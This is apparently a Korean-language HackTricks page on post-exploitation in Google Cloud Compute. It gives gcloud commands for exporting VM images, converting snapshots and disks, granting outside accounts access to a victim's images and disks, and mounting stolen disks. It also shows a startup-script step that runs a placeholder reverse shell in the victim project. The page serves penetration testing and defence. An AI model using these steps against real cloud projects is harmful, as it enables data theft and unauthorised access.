GCP - Compute Post Exploitation

Support HackTricks

Compute

Compute와 VPC (Networking)에 대한 자세한 정보는 다음을 참조하십시오:

GCP - Compute Enum

Export & Inspect Images locally

이 방법을 통해 공격자는 이미 존재하는 이미지에 포함된 데이터에 접근하거나 실행 중인 VM의 새로운 이미지를 생성하여 실행 중인 VM에 접근하지 않고도 데이터를 접근할 수 있습니다.

VM 이미지를 버킷으로 내보낸 다음 다운로드하여 로컬에서 마운트할 수 있습니다. 명령어는 다음과 같습니다:

gcloud compute images export --destination-uri gs://<bucket-name>/image.vmdk --image imagetest --export-format vmdk
# The download the export from the bucket and mount it locally

이 작업을 수행하기 위해 공격자는 스토리지 버킷에 대한 권한이 필요할 수 있으며, cloudbuild에 대한 권한이 반드시 필요합니다. 이는 서비스가 내보내기를 수행하도록 요청받을 것이기 때문입니다. 또한, 이를 위해 codebuild SA와 compute SA는 권한이 필요합니다. cloudbuild SA <project-id>@cloudbuild.gserviceaccount.com는 다음 권한이 필요합니다:

  • roles/iam.serviceAccountTokenCreator

  • roles/compute.admin

  • roles/iam.serviceAccountUser

그리고 SA <project-id>-compute@developer.gserviceaccount.com는 다음 권한이 필요합니다:

  • roles/compute.storageAdmin

  • roles/storage.objectAdmin

스냅샷 및 디스크를 로컬에서 내보내기 및 검사

스냅샷과 디스크를 직접 내보내는 것은 불가능하지만, 스냅샷을 디스크로 변환하고, 디스크를 이미지로 변환한 다음 이전 섹션을 따라 이미지를 내보내어 로컬에서 검사할 수 있습니다.

# Create a Disk from a snapshot
gcloud compute disks create [NEW_DISK_NAME] --source-snapshot=[SNAPSHOT_NAME] --zone=[ZONE]

# Create an image from a disk
gcloud compute images create [IMAGE_NAME] --source-disk=[NEW_DISK_NAME] --source-disk-zone=[ZONE]

VM을 생성하여 이미지 검사

이미지에 저장된 데이터 또는 실행 중인 VM 내부에 접근하는 것을 목표로, 공격자가 이미지를 생성한 경우 외부 계정에 이미지에 대한 접근 권한을 부여할 수 있습니다:

gcloud projects add-iam-policy-binding [SOURCE_PROJECT_ID] \
--member='serviceAccount:[TARGET_PROJECT_SERVICE_ACCOUNT]' \
--role='roles/compute.imageUser'

그리고 나서 새로운 VM을 생성합니다:

gcloud compute instances create [INSTANCE_NAME] \
--project=[TARGET_PROJECT_ID] \
--zone=[ZONE] \
--image=projects/[SOURCE_PROJECT_ID]/global/images/[IMAGE_NAME]

만약 외부 계정에 이미지에 대한 접근 권한을 줄 수 없다면, 피해자의 프로젝트에서 해당 이미지를 사용하여 VM을 실행하고 메타데이터가 리버스 쉘을 실행하도록 하여 이미지에 접근할 수 있습니다. 다음과 같은 매개변수를 추가합니다:

--metadata startup-script='#! /bin/bash
echo "hello"; <reverse shell>'

Inspect a Snapshot/Disk attaching it to a VM

디스크나 스냅샷에 저장된 데이터에 접근하기 위해, 스냅샷을 디스크로 변환하거나, 디스크를 이미지로 변환한 후 이전 단계를 따를 수 있습니다.

또는 외부 계정에 디스크 접근 권한을 부여할 수 있습니다 (시작점이 스냅샷인 경우 스냅샷에 접근 권한을 부여하거나 이를 디스크로 생성):

gcloud projects add-iam-policy-binding [PROJECT_ID] \
--member='user:[USER_EMAIL]' \
--role='roles/compute.storageAdmin'

디스크를 인스턴스에 연결:

gcloud compute instances attach-disk [INSTANCE_NAME] \
--disk [DISK_NAME] \
--zone [ZONE]

디스크를 VM 내부에 마운트하기:

  1. VM에 SSH 접속:

gcloud compute ssh [INSTANCE_NAME] --zone [ZONE]
  1. 디스크 식별: VM 내부에 접속한 후, 디스크 장치를 나열하여 새 디스크를 식별합니다. 일반적으로 /dev/sdb, /dev/sdc 등으로 찾을 수 있습니다.

  2. 디스크 포맷 및 마운트 (새 디스크 또는 원시 디스크인 경우):

  • 마운트 포인트 생성:

sudo mkdir -p /mnt/disks/[MOUNT_DIR]
  • 디스크 마운트:

sudo mount -o discard,defaults /dev/[DISK_DEVICE] /mnt/disks/[MOUNT_DIR]

스냅샷 또는 디스크에 외부 프로젝트에 대한 접근 권한을 부여할 수 없는 경우, 스냅샷/디스크와 동일한 프로젝트 내의 인스턴스에서 이러한 작업을 수행해야 할 수 있습니다.

HackTricks 지원하기

Last updated